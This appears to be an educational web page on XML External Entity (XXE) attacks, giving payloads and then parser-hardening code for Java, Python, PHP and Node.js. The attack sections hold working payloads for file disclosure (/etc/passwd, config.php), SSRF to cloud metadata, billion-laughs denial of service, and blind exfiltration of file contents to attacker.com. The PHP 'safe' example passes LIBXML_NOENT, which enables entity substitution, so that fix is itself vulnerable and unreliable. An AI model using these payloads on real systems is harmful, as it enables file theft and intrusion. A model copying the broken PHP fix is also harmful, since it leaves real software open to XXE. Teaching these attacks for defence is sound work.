Back to Learning Center
highOWASP A05:2021CWE-611

XML External Entity (XXE)

XML External Entity (XXE) attacks exploit vulnerable XML parsers that process external entity references. When applications accept XML input and use parsers with external entities enabled, attackers can read local files, perform SSRF attacks, or cause denial of service. Many XML parsers have dangerous defaults that enable these attacks.

Understanding XML Entities

XML entities are placeholders that expand when the document is parsed. External entities reference content from outside the document - files, URLs, or other resources:

xml
<?xml version="1.0"?>
<!DOCTYPE note [
  <!-- Internal entity -->
  <!ENTITY greeting "Hello World">
  
  <!-- External entity - reads local file -->
  <!ENTITY secret SYSTEM "file:///etc/passwd">
  
  <!-- External entity - makes HTTP request -->
  <!ENTITY external SYSTEM "http://attacker.com/malicious.dtd">
]>
<note>
  <message>&greeting;</message>      <!-- Expands to "Hello World" -->
  <data>&secret;</data>              <!-- Expands to /etc/passwd contents -->
</note>

Basic XXE Exploitation

File Disclosure

xml
<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<userInfo>
  <username>&xxe;</username>
</userInfo>

<!-- Server response includes file contents: -->
<userInfo>
  <username>root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...
  </username>
</userInfo>

Reading Source Code

xml
<!-- Use php:// filter to base64-encode (avoids XML parsing issues) -->
<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/var/www/html/config.php">
]>
<data>&xxe;</data>

<!-- Windows file paths -->
<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini">
<!ENTITY xxe SYSTEM "file:///c:/inetpub/wwwroot/web.config">

SSRF via XXE

xml
<?xml version="1.0"?>
<!DOCTYPE foo [
  <!-- Scan internal network -->
  <!ENTITY ssrf SYSTEM "http://192.168.1.1/admin">
  
  <!-- Access cloud metadata -->
  <!ENTITY metadata SYSTEM "http://169.254.169.254/latest/meta-data/">
  
  <!-- Internal services -->
  <!ENTITY redis SYSTEM "http://localhost:6379/">
]>
<data>&ssrf;</data>

Billion Laughs Attack (DoS)

xml
<?xml version="1.0"?>
<!DOCTYPE lolz [
  <!ENTITY lol "lol">
  <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
  <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
  <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
  <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
  <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
  <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
  <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>

<!-- Small XML expands to ~3GB in memory! -->

Blind XXE Exploitation

When the server doesn't return XML data in responses, use out-of-band techniques:

xml
<!-- Payload sent to target -->
<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY % file SYSTEM "file:///etc/passwd">
  <!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd">
  %dtd;
]>
<data>&exfil;</data>

<!-- evil.dtd on attacker's server -->
<!ENTITY % all "<!ENTITY exfil SYSTEM 'http://attacker.com/?data=%file;'>">
%all;

<!-- Server makes request to attacker with file contents in URL -->

Prevention Strategies

Java XML Parser Hardening

java
// Secure DocumentBuilderFactory configuration
DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();

// Disable all external entities and DTDs
dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
dbf.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
dbf.setXIncludeAware(false);
dbf.setExpandEntityReferences(false);

DocumentBuilder db = dbf.newDocumentBuilder();
Document doc = db.parse(xmlInput);

Python XML Parser Hardening

python
# UNSAFE - Standard library parsers with dangerous defaults
import xml.etree.ElementTree as ET
tree = ET.parse('file.xml')  # Vulnerable to XXE!

# SAFE - Use defusedxml library
import defusedxml.ElementTree as ET
tree = ET.parse('file.xml')  # Safe from XXE

# Or use lxml with safe settings
from lxml import etree

parser = etree.XMLParser(
    resolve_entities=False,
    no_network=True,
    dtd_validation=False,
    load_dtd=False
)
tree = etree.parse('file.xml', parser)

PHP XML Parser Hardening

php
<?php
// UNSAFE - Default settings allow XXE
$doc = new DOMDocument();
$doc->loadXML($userInput);  // Vulnerable!

// SAFE - Disable external entities
libxml_disable_entity_loader(true);  // Deprecated in PHP 8.0+

// PHP 8.0+ - Use LIBXML options
$doc = new DOMDocument();
$doc->loadXML($userInput, LIBXML_NOENT | LIBXML_DTDLOAD | LIBXML_DTDATTR);

// Better: Use LIBXML_NONET to prevent network access
$options = LIBXML_NOENT | LIBXML_NONET;
$doc->loadXML($userInput, $options);
?>

Node.js XML Parser Hardening

javascript
// UNSAFE - libxmljs default settings
const libxmljs = require('libxmljs');
const doc = libxmljs.parseXml(userInput);  // Vulnerable!

// SAFE - Disable entity substitution
const doc = libxmljs.parseXml(userInput, {
  noent: false,        // Don't substitute entities
  nonet: true,         // Don't fetch network resources
  noblanks: true,
  nocdata: true
});

// Even better: Use JSON instead of XML where possible
// Or use a streaming parser that doesn't support DTDs

Prefer JSON Over XML

javascript
// JSON cannot have external entities - inherently safe

// Instead of accepting XML:
app.post('/api/data', (req, res) => {
  const xml = req.body;  // Dangerous
  // Parse XML...
});

// Accept JSON:
app.post('/api/data', express.json(), (req, res) => {
  const data = req.body;  // Safe from XXE
  // Use data directly
});

// If you must accept XML, validate Content-Type
app.post('/api/data', (req, res) => {
  if (req.is('application/xml') || req.is('text/xml')) {
    // Parse with secure settings
  } else {
    res.status(415).send('Unsupported Media Type');
  }
});

Security Checklist

  • Disable DTD processing in all XML parsers
  • Disable external entity resolution
  • Use libraries like defusedxml (Python) or secure defaults
  • Prefer JSON over XML for data exchange
  • Validate and sanitize XML input before parsing
  • Apply principle of least privilege to file system access
  • Block outbound connections from XML processing services
  • Audit third-party libraries for XXE vulnerabilities

Practice Challenges

View all